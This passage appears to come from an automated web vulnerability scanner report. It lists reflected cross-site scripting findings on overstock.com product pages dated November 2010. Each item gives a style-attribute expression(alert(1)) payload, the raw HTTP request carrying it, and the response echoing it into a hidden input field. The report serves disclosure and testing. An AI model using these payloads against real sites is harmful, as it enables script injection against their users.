The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf911"style="x:expression(alert(1))"f07ee28680b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/AnnLoren-2-piece-Jungle-Rumba-Girls-Outfit/3416935/product.html?cf911"style%3d"x%3aexpression(alert(1))"f07ee28680b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:33 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:33 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:33 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3416935|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:33 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408133861:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="cf911"style="x:expression(alert(1))"f07ee28680b" value="1"/>
...[SNIP]...

2.19. http://www.overstock.com/Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b826f"style="x:expression(alert(1))"c70ef4a1e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/AnnLoren-Boutique-Girls-Pink-Safari-Rumba-2-piece-Set/4084522/product.html?b826f"style%3d"x%3aexpression(alert(1))"c70ef4a1e21=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:32 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:32 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408132889:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4084522|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:32 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:32 GMT; Path=/
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110295

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>An
...[SNIP]...
<input type="hidden" name="b826f"style="x:expression(alert(1))"c70ef4a1e21" value="1"/>
...[SNIP]...

2.20. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8bff"style="x:expression(alert(1))"c97f61e0979 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouch-Boots-with-Buckle/3469442/product.html?f8bff"style%3d"x%3aexpression(alert(1))"c97f61e0979=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:50:06 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:50:06 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289404206782:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:06 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3469442|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:06 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 123316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="f8bff"style="x:expression(alert(1))"c97f61e0979" value="1"/>
...[SNIP]...

2.21. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2988"style="x:expression(alert(1))"e89b9f54e41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html?e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:51 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3830685|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408271781:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="e2988"style="x:expression(alert(1))"e89b9f54e41" value="1"/>
...[SNIP]...

2.22. http://www.overstock.com/Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca6ff"style="x:expression(alert(1))"b12bf9c7c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html?ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:56 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408216847:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:56 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1579444|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="ca6ff"style="x:expression(alert(1))"b12bf9c7c1e" value="1"/>
...[SNIP]...

2.23. http://www.overstock.com/Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b5e7"style="x:expression(alert(1))"d793ce90ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html?7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:09 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408169855:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4146348|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:09 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:09 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117837

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="7b5e7"style="x:expression(alert(1))"d793ce90ed2" value="1"/>
...[SNIP]...

2.24. http://www.overstock.com/Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d68"style%3d"x%3aexpression(alert(1))"abff08642e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0d68"style="x:expression(alert(1))"abff08642e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

Request

GET /Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html?b0d68"style%3d"x%3aexpression(alert(1))"abff08642e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:56 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4726004|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408156590:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="b0d68"style="x:expression(alert(1))"abff08642e" value="1"/>
...[SNIP]...

2.25. http://www.overstock.com/Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941de"style%3d"x%3aexpression(alert(1))"3a880e61ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 941de"style="x:expression(alert(1))"3a880e61ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html?941de"style%3d"x%3aexpression(alert(1))"3a880e61ac=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
